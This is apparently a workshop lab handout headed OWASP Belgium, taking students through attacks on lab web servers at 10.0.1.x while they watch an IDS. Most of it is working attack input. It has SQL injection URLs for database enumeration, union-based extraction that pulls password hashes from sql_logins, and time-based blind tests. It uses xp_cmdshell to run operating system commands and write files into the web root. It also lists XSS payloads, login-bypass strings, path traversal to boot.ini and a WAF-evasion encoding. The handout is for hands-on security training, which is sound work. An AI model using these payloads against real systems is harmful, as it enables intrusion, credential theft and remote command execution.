OWASP Belgium
-------------

10.0.1.9			- This is the IDS


10.0.1.10			- This is the WebServiceApp


10.0.1.12			- This is the Win2K Webapp server










#######
# IDS #
#######
https://10.0.1.9
	or
https://10.0.1.9/base-1.4.5


Look for 10.0.1.7 (That's Joe) to see if he's being detected while doing the labs below.

You can also take note of your own IP address and see if you are being detected while performing the labs below.







#############################
# Let's have some fun!!!!!! #
#############################


Here is a web app that you can play with while I'm talking....

10.0.1.8



Here is the same app
10.0.1.11












=-=-=-= Lab 1  Simple Ways To Identify SQL Injection =-=-=-=


http://10.0.1.10/


http://10.0.1.10/bookdetail.aspx?id=2


http://10.0.1.10/bookdetail.aspx?id=2'		<-- A way to find SQLi


http://10.0.1.10/bookdetail.aspx?id='		<-- A way to find SQLi









=-=-=-= Lab 2  Advanced Ways To Identify SQL Injection =-=-=-=


Let's pretend that there is no error message when we insert the tick ('). Another way to determine is SQLI is possible is to use parenthesis to perform simple tests.


Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
-------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=(2)		<-- Another way to find SQLi


http://10.0.1.10/bookdetail.aspx?id=(4-2)	<-- Another way to find SQLi - this equates to 2 so we know SQL injection is possible


http://10.0.1.10/bookdetail.aspx?id=(4-1)	<-- Another way to find SQLi - you'll see that it yields a different page








=-=-=-= Lab 3  Database Enumeration =-=-=-=

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--

http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--








##################################################### 
# ERROR SQL INJECTION - EXTRACT 1st  DATABASE TABLE #
#####################################################  	

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
 http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--

Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.



#################################################### 
# ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE #
####################################################
  	 
Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
 http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sqlmapoutput')--

Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.


#################################################### 
# ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE #
####################################################

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------  	
 http://10.0.1.10/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.







=-=-=-= Lab 4  Union Based SQL Injection =-=-=-=

Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=2 order by 100--

http://10.0.1.10/bookdetail.aspx?id=2 order by 50--

http://10.0.1.10/bookdetail.aspx?id=2 order by 25--

http://10.0.1.10/bookdetail.aspx?id=2 order by 10--

http://10.0.1.10/bookdetail.aspx?id=2 order by 5--

http://10.0.1.10/bookdetail.aspx?id=2 order by 6--

http://10.0.1.10/bookdetail.aspx?id=2 order by 7--

http://10.0.1.10/bookdetail.aspx?id=2 order by 8--

http://10.0.1.10/bookdetail.aspx?id=2 order by 9--

http://10.0.1.10/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--

http://10.0.1.10/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--











=-=-=-= Lab 5  True/False SQL Injection =-=-=-=



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=2 or 1=1--

http://10.0.1.10/bookdetail.aspx?id=2 or 1=2--

http://10.0.1.10/bookdetail.aspx?id=1*1



You should notice that you get one page when you submit a true statement, and another one when you submit a false statement. 

This is the basis of how sql injection works.





Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------

http://10.0.1.10/bookdetail.aspx?id=2 or 1 >-1#

http://10.0.1.10/bookdetail.aspx?id=2 or 1<99#

http://10.0.1.10/bookdetail.aspx?id=2 or 1<>1#

http://10.0.1.10/bookdetail.aspx?id=2 or 2 != 3--

http://10.0.1.10/bookdetail.aspx?id=2 &0#






Tell me what these commands do (1 point for each command ), and do they get detected by the IDS:
------------------------------------------------------------------------------------------------

Browse to the following URL:

	http://10.0.1.12/book/





In the Search box type each of the following:


	<script>alert('xss')</script>


	<script>alert(1)</script>

	<script>alert(String.fromCharCode(88,83,83))</script>

	%3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E

	prompt('xss')

	prompt%28%27xss%27%29






http://10.0.1.12/book/			

	Click "ASP"




http://10.0.1.12/book/Books.asp?STechID=1		

	Click "Professional ASP"



http://10.0.1.12/book/ViewBookDetails.asp?STechID=1&BookID=1	

	Click "Write A Review"
	In the "Write Your Review" box type:


	<script>alert('xss')</script>




http://10.0.1.12/book/				

	Click "ASP"




http://10.0.1.12/book/Books.asp?STechID=1				

	Click "Professional ASP"





http://10.0.1.12/book/ViewBookDetails.asp?STechID=1&BookID=1	

	Click "Upload Review"



Create a file called yourname.txt - and in the file insert the text: 

<script>alert('xss')</script>



	Upload the newly created file






=-=-=-= Lab 9: Classic Manual SQL Injection =-=-=-=


Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1; waitfor delay '00:00:10'--



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;if+not(select+system_user)+<>+'yourname'+waitfor+delay+'00:00:10'--




Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;if+not(select+system_user)+<>+'dbo'+waitfor+delay+'00:00:10'--



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'00:00:10'--



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--



Go to the address below in firefox - Tell me what this command does (1 point), and does it get detected by the IDS:
--------------------------------------------------------------------------------------------------------------------
http://10.0.1.12/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\book\dir_yourname.txt'--



Go to the address below in firefox:
http://10.0.1.12/book/dir_yourname.txt

	Did it work?














###############################
# Trading Web App on 10.0.1.8 #
###############################

Search Box:
	Joe'+OR+1=1;--


	<script>alert(123);</script>
	
	WebScarab (change search request to):
	http://10.0.1.8/Searchresult.aspx?<script>alert(123);</script>=ScriptName


	xss_upload.txt (Upload Bulk Order)
	<script>alert(123);</script>


Login Box:

	' or 1=1 or ''='
	anything



Contact Us:
	WebScarab (change the request to):
	http://10.0.1.8/OpenPage.aspx?filename=../../../../boot.ini







Inquiry:
	Joe McCray
	1234567890
	joe@strategicsec.com') waitfor delay '00:00:10'--









#########################################
# Trading Web App with WAF on 10.0.1.11 #
#########################################


Search Box:
	Joe'+OR+1='1


	<script>alert(123);</script>
	
	WebScarab (change search request to):
	http://10.0.1.11/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName


	xss_upload.txt (Upload Bulk Order)
	<script>alert(123);</script>


Login Box:

	' or 1=1 or ''='
	anything



